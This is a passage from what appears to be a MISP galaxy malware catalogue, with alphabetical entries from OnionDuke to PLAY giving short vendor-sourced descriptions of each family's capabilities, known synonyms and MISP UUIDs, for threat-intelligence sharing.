OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites.

Internal MISP references

UUID abd10caa-7d4c-4c22-8dae-8d32f13232d7 which can be used as unique global reference for OnionDuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OnlinerSpambot

A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular OnlinerSpambot.

Known Synonyms
`Onliner`
`SBot`

Internal MISP references

UUID 6cf05dad-86c8-4f46-b5b8-0a004360563f which can be used as unique global reference for OnlinerSpambot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OopsIE

Internal MISP references

UUID d07c3def-91af-4d9b-bdf7-62c9e0b44968 which can be used as unique global reference for OopsIE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Opachki

Internal MISP references

UUID f50de0a8-35a7-406e-9f53-8f7d5448e1e7 which can be used as unique global reference for Opachki in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OpcJacker

Internal MISP references

UUID 22f732f4-efcf-4eb5-8c51-8338dfd33297 which can be used as unique global reference for OpcJacker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OpenSUpdater

Internal MISP references

UUID 03d44ec8-ebb4-4d90-9773-c11f4a7de074 which can be used as unique global reference for OpenSUpdater in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OpenCarrot

Internal MISP references

UUID 7fb5882e-1682-45d3-9dfb-204e6c1ca4c9 which can be used as unique global reference for OpenCarrot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OpGhoul

This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.

Internal MISP references

UUID 25a280b2-0260-4593-bf8c-7062dfdc6c38 which can be used as unique global reference for OpGhoul in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OpBlockBuster

Internal MISP references

UUID 25c962c5-5616-4fe3-ad44-68c4ac4c726d which can be used as unique global reference for OpBlockBuster in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ORANGEADE

FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.

Internal MISP references

UUID 092262b0-c631-400d-9f38-017cd59a14fd which can be used as unique global reference for ORANGEADE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OrcaRAT

OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.

Internal MISP references

UUID 08103f1c-f83d-4037-a1ae-109b06f79226 which can be used as unique global reference for OrcaRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Orchard

A malware generating DGA domains seeded by the Bitcoin Genesis Block. This family has strong code overlap with win.victorygate.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Orchard.

Known Synonyms
`Antavmu`

Internal MISP references

UUID 094159e7-cc4f-4c47-b24e-b0a32ba23a58 which can be used as unique global reference for Orchard in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Orcus RAT

Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Orcus RAT.

Known Synonyms
`Schnorchel`

Internal MISP references

UUID c41e7fdd-f1b1-4b87-97d7-634202af8b61 which can be used as unique global reference for Orcus RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ordinypt

This malware claims to be a ransomware, but it's actually a wiper. After execution, this malware terminates a number of processes such as database processes, likely to allow access to any files that these programs may have held open. Ordinypt will avoid wiping certain files and folders in order to prevent the infected machine from becoming unusable. Affected files are overwritten with null character and receive a random 5 character file extension. Finally, shadow copies are removed and Windows startup repair is disabled to complicate recovery of data from the affected system. The desktop background is changed and a ransom note is dropped for the victim. A C2 check-in occurs to keep track of the file extension used on that specific machine, as well as which BitCoin address was randomly provided for payment to the victim (drawn from a long list stored in the ransomware configuration).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ordinypt.

Known Synonyms
`GermanWiper`
`HSDFSDCrypt`

Internal MISP references

UUID 7fd96553-4c78-43de-824f-82645ed4fac5 which can be used as unique global reference for Ordinypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OriginBot

OriginBot is a modular information stealer which can also download and execute other malicious payloads.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular OriginBot.

Known Synonyms
`OriginBotnet`
`OriginLoader`

Internal MISP references

UUID 1a2ae63f-323f-4ff7-b465-484f1e87fca4 which can be used as unique global reference for OriginBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OriginLogger

Internal MISP references

UUID c1680c8e-c2e2-4975-82ad-8829b3918d70 which can be used as unique global reference for OriginLogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ORPCBackdoor

Internal MISP references

UUID 27c09b74-6e1e-4567-ae10-75eee3395c36 which can be used as unique global reference for ORPCBackdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Oski Stealer

Oski is a stealer written in C++ that appeared around November 2019 and is being sold for between 70$ to 100$ on Russian-speaking forums. It collects different types of data (cryptocurrency wallets, saved passwords, files matching an attacker-defined pattern etc) and it exfiltrates it in a zip file uploaded to the attacker's panel.

Internal MISP references

UUID 414d8e68-77e7-4157-936a-d70d80e5efc0 which can be used as unique global reference for Oski Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Osno

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Osno.

Known Synonyms
`Babax`

Internal MISP references

UUID e2be4da9-0a8f-45a5-a69b-7f16acb39398 which can be used as unique global reference for Osno in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ousaban

Internal MISP references

UUID 6620c7ce-63a2-48db-a584-4c5c516bda13 which can be used as unique global reference for Ousaban in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OutCrypt

Ransomware.

Internal MISP references

UUID 90e5a21a-c058-47a0-aa4d-bffde7ba698e which can be used as unique global reference for OutCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Outlook Backdoor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Outlook Backdoor.

Known Synonyms
`FACADE`

Internal MISP references

UUID 10a521e4-b3b9-4feb-afce-081531063e7b which can be used as unique global reference for Outlook Backdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OutSteel

According to MITRE, OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Ember Bear since at least March 2021.

Internal MISP references

UUID d2aab7c9-b83a-4889-9fae-c495ec4d324d which can be used as unique global reference for OutSteel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Overlay RAT

Internal MISP references

UUID 842687f5-91bc-4719-ac3f-4166ae02e0cd which can be used as unique global reference for Overlay RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OvidiyStealer

Internal MISP references

UUID 30d49b12-0dca-4652-9f7a-4d0cf7555375 which can be used as unique global reference for OvidiyStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

owaauth

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular owaauth.

Known Synonyms
`luckyowa`

Internal MISP references

UUID 37f66fcc-e093-4d97-902d-c96602a7d234 which can be used as unique global reference for owaauth in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Owlproxy

Internal MISP references

UUID 7a6d97a2-821f-4083-9180-3f70a851ad5e which can be used as unique global reference for Owlproxy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Owowa

Kaspersky describes this as a OWA add-on that has credential stealing capabilities.

Internal MISP references

UUID aa985bc5-92e4-43c6-a01b-1de02818cfc9 which can be used as unique global reference for Owowa in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OxtaRAT

Internal MISP references

UUID a5b379c0-7934-4a50-9a34-7ad1524b1fb0 which can be used as unique global reference for OxtaRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OZH RAT

Internal MISP references

UUID c9eefa23-4881-490f-abff-c78fe0c165ff which can be used as unique global reference for OZH RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ozone RAT

Internal MISP references

UUID 4e319700-9350-4656-91f5-0b495af4e8ad which can be used as unique global reference for Ozone RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PadCrypt

Internal MISP references

UUID c21335f5-b145-4029-b1bc-161362c7ce80 which can be used as unique global reference for PadCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

paladin

Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.

Internal MISP references

UUID c6728a76-f4d9-4c49-a3aa-be895df13a35 which can be used as unique global reference for paladin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PandaBanker

According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.

This banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.

The baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.

Panda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PandaBanker.

Known Synonyms
`ZeusPanda`

Internal MISP references

UUID 31ebe294-f125-4cf3-95cc-f4150ab23303 which can be used as unique global reference for PandaBanker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Panda Stealer

According to PCrisk, Panda is the name of a malicious program, which is classified as a stealer. It is a new variant of CollectorStealer.

The aim of this malware is to extract and exfiltrate sensitive and personal information from infected devices. Panda primarily targets data relating to cryptocurrency wallets.

This piece of malicious software has been observed being actively distributed via spam campaigns - large-scale operations during which thousands of scam emails are sent. The spam mail proliferating Panda stealer heavily targeted users from the United States, Germany, Japan, and Australia.

The deceptive email letters concerned business-related topics (e.g., fake product quote requests, etc.). Panda stealer is a dangerous program, and as such - its infections must be removed immediately upon detection.

Internal MISP references

UUID 7fa924a9-4d7a-406c-b298-bf3b01557ac8 which can be used as unique global reference for Panda Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pandora

Pandora ransomware was obtained by vx-underground at 2022-03-14.

Internal MISP references

UUID e43b67bc-3c16-4a69-b63d-f6bf3d732e1b which can be used as unique global reference for Pandora in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pandora RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pandora RAT.

Known Synonyms
`Pandora hVNC RAT`

Internal MISP references

UUID db259f3d-b8a1-44d4-8c4d-15bfea2a0c59 which can be used as unique global reference for Pandora RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Paradies Clipper

Internal MISP references

UUID dd1bb757-6084-408a-8090-4e2bf0834c09 which can be used as unique global reference for Paradies Clipper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Paradise

Ransomware.

Internal MISP references

UUID 4f7e7602-79f8-4eea-8239-fb2d4ceadb9f which can be used as unique global reference for Paradise in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Parallax RAT

Parallax is a Remote Access Trojan used by attackers to gain access to a victim's machine. It was involved in one of the many infamous "coronamalware" campaigns. Basically, the attackers abused the COVID-19 pandemic news to lure victims into opening themed emails spreading parallax.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Parallax RAT.

Known Synonyms
`ParallaxRAT`

Internal MISP references

UUID 39f74f33-467e-47a4-bd2f-e0a191dee9ca which can be used as unique global reference for Parallax RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

parasite_http

Internal MISP references

UUID c5eee19f-0877-4709-86ea-328e346af1bf which can be used as unique global reference for parasite_http in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PartyTicket

PartyTicket is a Go-written ransomware, which was described as a poorly designed one by Zscaler. According to Brett Stone-Gross this malware is likely intended to be a diversion from the Hermetic wiper (aka. KillDisk.NCV, DriveSlayer) attack.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PartyTicket.

Known Synonyms
`Elections GoRansom`
`HermeticRansom`
`SonicVote`

Internal MISP references

UUID 697d905a-5353-43ed-97e0-15f7d2763b69 which can be used as unique global reference for PartyTicket in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Passlock

Ransomware.

Internal MISP references

UUID 1e78c732-c2f0-4178-a1f5-ccdab0e2d4b8 which can be used as unique global reference for Passlock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pay2Key

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pay2Key.

Known Synonyms
`Cobalt`

Internal MISP references

UUID 46dc64c6-e927-44fc-b4a4-efd1677ae030 which can be used as unique global reference for Pay2Key in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PayloadBIN

Internal MISP references

UUID 313c81ab-fba2-4577-8de6-863515a65c45 which can be used as unique global reference for PayloadBIN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PcShare

PcShare is a open-source backdoor which has been seen modified and used by Chinese threat actors, mainly attacking countries in South East Asia.

Internal MISP references

UUID 42100d7e-39c7-47c0-bc9e-3c590ed0d837 which can be used as unique global reference for PcShare in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PEBBLEDASH

Internal MISP references

UUID d6da9699-778c-4c97-82f4-1e9113283bd4 which can be used as unique global reference for PEBBLEDASH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PeddleCheap

PeddleCheap is a module of the DanderSpritz framework which surface with the "Lost in Translation" release of TheShadowBrokers leaks. In May 2020, ESET mentioned that they found mysterious samples of PeddleCheap packed with a custom packer so far exclusively attributed to Winnti.

Internal MISP references

UUID ee450087-00e4-4b59-9ea7-6650d5551ea9 which can be used as unique global reference for PeddleCheap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pekraut

Internal MISP references

UUID 88f636b9-9c2e-4faf-ab83-b91009bf47fc which can be used as unique global reference for Pekraut in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pelmeni

Wrapper for Kazuar.

Internal MISP references

UUID 99a3e821-2080-47ae-abed-7694d5fa81e6 which can be used as unique global reference for Pelmeni in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Penco

Internal MISP references

UUID a2fd9b8a-826d-4df5-9a29-d61a8456d086 which can be used as unique global reference for Penco in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.penco - webarchive

Associated metadata

Metadata key	Value
type	[]

PennyWise Stealer

Internal MISP references

UUID c222def2-0f1f-4c74-9e37-757e964ff3c6 which can be used as unique global reference for PennyWise Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Peppy RAT

Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.

Internal MISP references

UUID 49321579-9dfe-45c6-80df-79467e4af65d which can be used as unique global reference for Peppy RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PetrWrap

The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim’s machine. What’s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.

Internal MISP references

UUID 82ed8fae-552e-407b-b3fc-f617b7a8f996 which can be used as unique global reference for PetrWrap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Petya

Internal MISP references

UUID 34c9dbaa-97ac-4e1e-9eca-b7c492d67efc which can be used as unique global reference for Petya in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

pgift

Information gathering and downloading tool used to deliver second stage malware to the infected system

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular pgift.

Known Synonyms
`ReRol`

Internal MISP references

UUID add29684-94b7-4c75-a43b-d039c4b76158 which can be used as unique global reference for pgift in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift - webarchive

Associated metadata

Metadata key	Value
type	[]

PhanDoor

Internal MISP references

UUID 3a77d0d4-6fb1-4092-9fe3-bf1f51a6677c which can be used as unique global reference for PhanDoor in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor - webarchive
https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf

Associated metadata

Metadata key	Value
type	[]

Phemedrone Stealer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Phemedrone Stealer.

Known Synonyms
`Ov3r_Stealer`

Internal MISP references

UUID 13c5f597-d7e4-41c7-8143-060a024a9cac which can be used as unique global reference for Phemedrone Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Philadephia Ransom

Internal MISP references

UUID f2a10bec-4783-4cfc-8e93-acd3c12a517d which can be used as unique global reference for Philadephia Ransom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Phobos

MalwareBytes states that Phobos is one of the ransomware families that are distributed via hacked Remote Desktop (RDP) connections. This isn't surprising, as hacked RDP servers are a cheap commodity on the underground market, and can make for an attractive and cost efficient dissemination vector for threat groups.

Internal MISP references

UUID d061daca-4415-4b3e-9034-231e37857eed which can be used as unique global reference for Phobos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Phoenix Keylogger

Keylogger, information stealer.

Internal MISP references

UUID 601ea680-68ec-43c9-ba20-88eaaefe8818 which can be used as unique global reference for Phoenix Keylogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Phoenix Locker

Internal MISP references

UUID 58aff639-0eda-4a80-9fe8-22e0498af728 which can be used as unique global reference for Phoenix Locker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Phonk

Internal MISP references

UUID e0aa3f91-59d6-4344-bcc5-d602aaab21f9 which can be used as unique global reference for Phonk in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PHOREAL

Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PHOREAL.

Known Synonyms
`Rizzo`

Internal MISP references

UUID 3aa6fd62-9b91-4136-af0e-08af7962ba4b which can be used as unique global reference for PHOREAL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Phorpiex

Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Phorpiex.

Known Synonyms
`Trik`
`phorphiex`

Internal MISP references

UUID 9759f99b-6d6c-4633-aa70-cb1d2bacc540 which can be used as unique global reference for Phorpiex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PHOTOFORK

PHOTOFORK is a downloader which is a modified version of GZIPLOADER. It was first detected in February 2023 and was distributed by TA581 along with an unattributed threat activity cluster that facilitated initial access. In this version, the configuration file is no longer encrypted using a simple XOR algorithm with a 64-byte key. Instead, it uses a custom algorithm previously used by the Standard core loader. This algorithm decrypts DLL strings that are needed to resolve handles to the necessary DLLs later on. The strings are decrypted using an algorithm that splits the data into DWORDs and XORs it against a random key. The main objective of PHOTOFORK remains the same as GZIPLOADER, i.e. to deliver an encrypted bot and core DLL loader (forked) that loads the Forked ICEDID bot into memory using a custom PE format.

Internal MISP references

UUID 10d3dd4b-8858-4131-bcf0-60982f36e43d which can be used as unique global reference for PHOTOFORK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PHOTOLITE

PHOTOLITE is the lite version of the GZIPLOADER with limited capabilities i.e. for example it does not have any functionality to exfiltrate the host information. This new variant is observed as a follow-on payload in a TA542 Emotet campaign back in November'22. contains a static URL to download a "Bot Pack" file with a static name (botpack.dat) which results in the IcedID Lite DLL Loader, and then delivers the Forked version of IcedID Bot, leaving out the webinjects and backconnect functionality that would typically be used for banking fraud.

Internal MISP references

UUID e4609860-99f9-47c9-9e36-350611466f3c which can be used as unique global reference for PHOTOLITE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PhotoLoader

A loader used to deliver IcedID, fetching a fake image from which payloads are extracted.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PhotoLoader.

Known Synonyms
`GZIPLOADER`

Internal MISP references

UUID 3418ca80-73d9-49ab-836a-98230a83c67d which can be used as unique global reference for PhotoLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PicassoLoader

Internal MISP references

UUID 77223b00-0299-416b-9b91-fa0cf1306cd3 which can be used as unique global reference for PicassoLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PICKPOCKET

PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed solely utilized by APT34.

Internal MISP references

UUID 2eb298de-e14b-46c1-a45f-26ae0d2c4003 which can be used as unique global reference for PICKPOCKET in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PIEHOP

According to Mandiant, PIEHOP is a disruption tool written in Python and packaged with PyInstaller version 2.1+ that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU. PIEHOP expects its main function to be called via another Python file, supplying either the argument control=True or upload=True. At a minimum, it requires the following arguments: oik, user, and pwd, and if called with control=True, it must also be supplied with iec104.

Internal MISP references

UUID 2b025b03-9241-4fe4-b691-46c7bace87e4 which can be used as unique global reference for PIEHOP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pierogi

Internal MISP references

UUID 2bda00e8-e6a7-448d-8dfa-4f2276230e8b which can be used as unique global reference for Pierogi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pikabot

Introducing Pikabot, an emerging malware family that comprises a downloader/installer, a loader, and a core backdoor component. Despite being in the early stages of development, it already demonstrates advanced techniques in evasion, injection, and anti-analysis. Notably, the loader component incorporates an array of sophisticated anti-debugging and anti-VM measures inspired by the open-source Al-Khaser project, while leveraging steganography to conceal its payload. Additionally, Pikabot utilizes a proprietary C2 framework and supports a diverse range of commands, encompassing host enumeration and advanced secondary payload injection options.

Internal MISP references

UUID 992151e9-2d4d-4621-9a2e-f2219f97e55b which can be used as unique global reference for Pikabot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PILLOWMINT

According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory. Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged) Contains additional backdoor capabilities including: Running processes Downloading and executing files (T1105: Remote File Copy) Downloading and injecting DLLs (T1055: Process Injection) Communicates with a command and control (C2) server over HTTP using AES encrypted messages (T1071: Standard Application Layer Protocol) (T1032: Standard Cryptographic Protocol)

Internal MISP references

UUID dec78ec5-f02d-461f-a8cc-cd4e80099e38 which can be used as unique global reference for PILLOWMINT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PinchDuke

According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke’s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.

Internal MISP references

UUID d837fc8e-1298-4911-9cfd-eb434a25bf3a which can be used as unique global reference for PinchDuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PINEGROVE

Internal MISP references

UUID 8c9289d7-3e16-46dd-9506-187a42206cba which can be used as unique global reference for PINEGROVE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PingBack

Internal MISP references

UUID a05b1eba-8e89-4d05-97ef-cacc5a083913 which can be used as unique global reference for PingBack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

pipcreat

Internal MISP references

UUID ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5 which can be used as unique global reference for pipcreat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PipeMon

Internal MISP references

UUID 34c0b51a-7139-44ab-b09a-cef646e66ba0 which can be used as unique global reference for PipeMon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PipeSnoop

Cisco Talos states that PipeSnoop can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PipeSnoop.

Known Synonyms
`TOFUPIPE`

Internal MISP references

UUID 29e75560-d16f-4434-a6a5-0258a916103d which can be used as unique global reference for PipeSnoop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PirateStealer

Infostealer

Internal MISP references

UUID 19748031-0d8d-4e76-bf8e-0838f8a3d07c which can be used as unique global reference for PirateStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

pirpi

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular pirpi.

Known Synonyms
`CookieCutter`
`SHOTPUT`

Internal MISP references

UUID e2325481-006f-4ad4-86d9-1a2ae6fea154 which can be used as unique global reference for pirpi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pitou

According to TG Soft, Pitou has beeen released on April 2014. It maybe an evolution of the rootkit "Srzizbi" developed on 2008. Pitou is a spambot, the main goal is send spam form the computer of victim.

Internal MISP references

UUID f371c85c-56f6-4ddf-8502-81866da4965b which can be used as unique global reference for Pitou in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PittyTiger RAT

Internal MISP references

UUID 7ac902e0-4a7d-4451-b0fd-cdf98fbe5018 which can be used as unique global reference for PittyTiger RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pkybot

Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pkybot.

Known Synonyms
`Bublik`
`Pykbot`
`TBag`

Internal MISP references

UUID 19d71f38-422c-48f4-9f90-867eb4d4182e which can be used as unique global reference for Pkybot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PLAINTEE

Internal MISP references

UUID 66087a9c-b5ac-4d6d-b79e-c0294728c876 which can be used as unique global reference for PLAINTEE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PLAY

According to PCrisk, PLAY is the name of a ransomware-type program. Malware categorized as such operates by encrypting data and demanding ransoms for the decryption.

After we executed a sample of this ransomware on our test machine, it encrypted files and appended their filenames with a ".PLAY" extension. For example, a file titled "1.jpg" appeared as "1.jpg.PLAY", "2.png" as "2.png.PLAY", etc. Once the encryption process was completed, PLAY created a text file named "ReadMe.txt" on the desktop.

Synonyms

